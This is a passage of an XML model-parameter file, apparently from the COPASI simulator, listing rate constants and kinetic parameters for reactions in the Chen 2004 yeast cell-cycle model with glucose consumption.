<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppnet]" value="0.410453463847625" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpnet]" value="0.3324302671175433" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdppx]" value="0.8999351532761247" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdpds]" value="0.1260054117516113" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vaiep]" value="0.001536552944821854" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vd2c1]" value="0.02672503275178556" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vd2f6]" value="0.02826158569660742" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppc1]" value="1.199147754801158" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppf6]" value="1.199147754801158" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[F]" value="0.4427813303603884" type="ModelValue" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor]" value="6.0221415e+23" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[1stDivisionTime]" value="-1" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mu2]" value="0.007" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[T0]" value="0" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Period]" value="0" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[KmGLU]" value="0.00012" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[GLUconsumed]" value="0" type="ModelValue" simulationType="ode"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[quantity_1]" value="0" type="ModelValue" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="String=Kinetic Parameters" type="Group">
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Growth]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Growth],ParameterGroup=Parameters,Parameter=k" value="0.007" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mu2],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Growth],ParameterGroup=Parameters,Parameter=Kmsub" value="0.00012" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[KmGLU],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of CLN2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of CLN2],ParameterGroup=Parameters,Parameter=ksn2_p" value="0" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksn2'],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of CLN2],ParameterGroup=Parameters,Parameter=ksn2_p_p" value="0.15" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksn2''],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLN2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLN2],ParameterGroup=Parameters,Parameter=kdn2" value="0.12" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdn2],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of CLB2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of CLB2],ParameterGroup=Parameters,Parameter=ksb2_p" value="0.001" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksb2'],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of CLB2],ParameterGroup=Parameters,Parameter=ksb2_p_p" value="0.04" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksb2''],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLB2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLB2],ParameterGroup=Parameters,Parameter=Vdb2" value="0.4589400389952509" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb2],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of CLB5]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of CLB5],ParameterGroup=Parameters,Parameter=ksb5_p" value="0.0008" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksb5'],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of CLB5],ParameterGroup=Parameters,Parameter=ksb5_p_p" value="0.005" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksb5''],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLB5]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLB5],ParameterGroup=Parameters,Parameter=Vdb5" value="0.07089635273693944" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb5],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of SIC1]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of SIC1],ParameterGroup=Parameters,Parameter=ksc1_p" value="0.012" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksc1'],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of SIC1],ParameterGroup=Parameters,Parameter=ksc1_p_p" value="0.12" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksc1''],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Phosphorylation of SIC1]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Phosphorylation of SIC1],ParameterGroup=Parameters,Parameter=Vkpc1" value="0.0623561288838139" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpc1],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dephosphorylation of SIC1]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dephosphorylation of SIC1],ParameterGroup=Parameters,Parameter=Vppc1" value="1.199147754801158" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppc1],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Fast Degradation of SIC1P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Fast Degradation of SIC1P],ParameterGroup=Parameters,Parameter=kd3c1" value="1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd3c1],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Assoc. of CLB2 and SIC1]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Assoc. of CLB2 and SIC1],ParameterGroup=Parameters,Parameter=kasb2" value="50" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasb2],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dissoc. of CLB2/SIC1 complex]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dissoc. of CLB2/SIC1 complex],ParameterGroup=Parameters,Parameter=kdib2" value="0.05" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdib2],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Assoc. of CLB5 and SIC1]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Assoc. of CLB5 and SIC1],ParameterGroup=Parameters,Parameter=kasb5" value="50" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasb5],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dissoc. of CLB5/SIC1]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dissoc. of CLB5/SIC1],ParameterGroup=Parameters,Parameter=kdib5" value="0.06" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdib5],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Phosphorylation of C2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Phosphorylation of C2],ParameterGroup=Parameters,Parameter=Vkpc1" value="0.0623561288838139" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpc1],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dephosphorylation of C2P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dephosphorylation of C2P],ParameterGroup=Parameters,Parameter=Vppc1" value="1.199147754801158" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppc1],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Phosphorylation of C5]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Phosphorylation of C5],ParameterGroup=Parameters,Parameter=Vkpc1" value="0.0623561288838139" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpc1],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dephosphorylation of C5P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dephosphorylation of C5P],ParameterGroup=Parameters,Parameter=Vppc1" value="1.199147754801158" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppc1],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLB2 in C2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLB2 in C2],ParameterGroup=Parameters,Parameter=Vdb2" value="0.4589400389952509" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb2],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLB5 in C5]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLB5 in C5],ParameterGroup=Parameters,Parameter=Vdb5" value="0.07089635273693944" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb5],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of SIC1 in C2P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of SIC1 in C2P],ParameterGroup=Parameters,Parameter=kd3c1" value="1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd3c1],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of SIC1P in C5P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of SIC1P in C5P],ParameterGroup=Parameters,Parameter=kd3c1" value="1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd3c1],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLB2 in C2P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLB2 in C2P],ParameterGroup=Parameters,Parameter=Vdb2" value="0.4589400389952509" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb2],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLB5 in C5P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CLB5 in C5P],ParameterGroup=Parameters,Parameter=Vdb5" value="0.07089635273693944" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb5],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC6 synthesis]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC6 synthesis],ParameterGroup=Parameters,Parameter=ksf6_p" value="0.024" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksf6'],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC6 synthesis],ParameterGroup=Parameters,Parameter=ksf6_p_p" value="0.12" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksf6''],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC6 synthesis],ParameterGroup=Parameters,Parameter=ksf6_p_p_p" value="0.004" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksf6'''],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Phosphorylation of CDC6]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Phosphorylation of CDC6],ParameterGroup=Parameters,Parameter=Vkpf6" value="0.06275343987480581" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpf6],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dephosphorylation of CDC6]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dephosphorylation of CDC6],ParameterGroup=Parameters,Parameter=Vppf6" value="1.199147754801158" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppf6],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CDC6P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CDC6P],ParameterGroup=Parameters,Parameter=kd3f6" value="1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd3f6],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB2/CDC6 complex formation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB2/CDC6 complex formation],ParameterGroup=Parameters,Parameter=kasf2" value="15" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasf2],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB2/CDC6 dissociation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB2/CDC6 dissociation],ParameterGroup=Parameters,Parameter=kdif2" value="0.5" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdif2],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB5/CDC6 complex formation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB5/CDC6 complex formation],ParameterGroup=Parameters,Parameter=kasf5" value="0.01" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasf5],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB5/CDC6 dissociation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB5/CDC6 dissociation],ParameterGroup=Parameters,Parameter=kdif5" value="0.01" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdif5],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[F2 phosphorylation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[F2 phosphorylation],ParameterGroup=Parameters,Parameter=Vkpf6" value="0.06275343987480581" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpf6],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[F2P dephosphorylation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[F2P dephosphorylation],ParameterGroup=Parameters,Parameter=Vppf6" value="1.199147754801158" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppf6],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[F5 phosphorylation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[F5 phosphorylation],ParameterGroup=Parameters,Parameter=Vkpf6" value="0.06275343987480581" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpf6],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[F5P dephosphorylation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[F5P dephosphorylation],ParameterGroup=Parameters,Parameter=Vppf6" value="1.199147754801158" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppf6],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB2 degradation in F2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB2 degradation in F2],ParameterGroup=Parameters,Parameter=Vdb2" value="0.4589400389952509" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb2],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB5 degradation in F5]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB5 degradation in F5],ParameterGroup=Parameters,Parameter=Vdb5" value="0.07089635273693944" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb5],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC6 degradation in F2P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC6 degradation in F2P],ParameterGroup=Parameters,Parameter=kd3f6" value="1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd3f6],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC6 degradation in F5P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC6 degradation in F5P],ParameterGroup=Parameters,Parameter=kd3f6" value="1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd3f6],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB2 degradation in F2P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB2 degradation in F2P],ParameterGroup=Parameters,Parameter=Vdb2" value="0.4589400389952509" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb2],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB5 degradation in F5P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CLB5 degradation in F5P],ParameterGroup=Parameters,Parameter=Vdb5" value="0.07089635273693944" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb5],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of SWI5]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of SWI5],ParameterGroup=Parameters,Parameter=ksswi_p" value="0.005" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksswi'],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
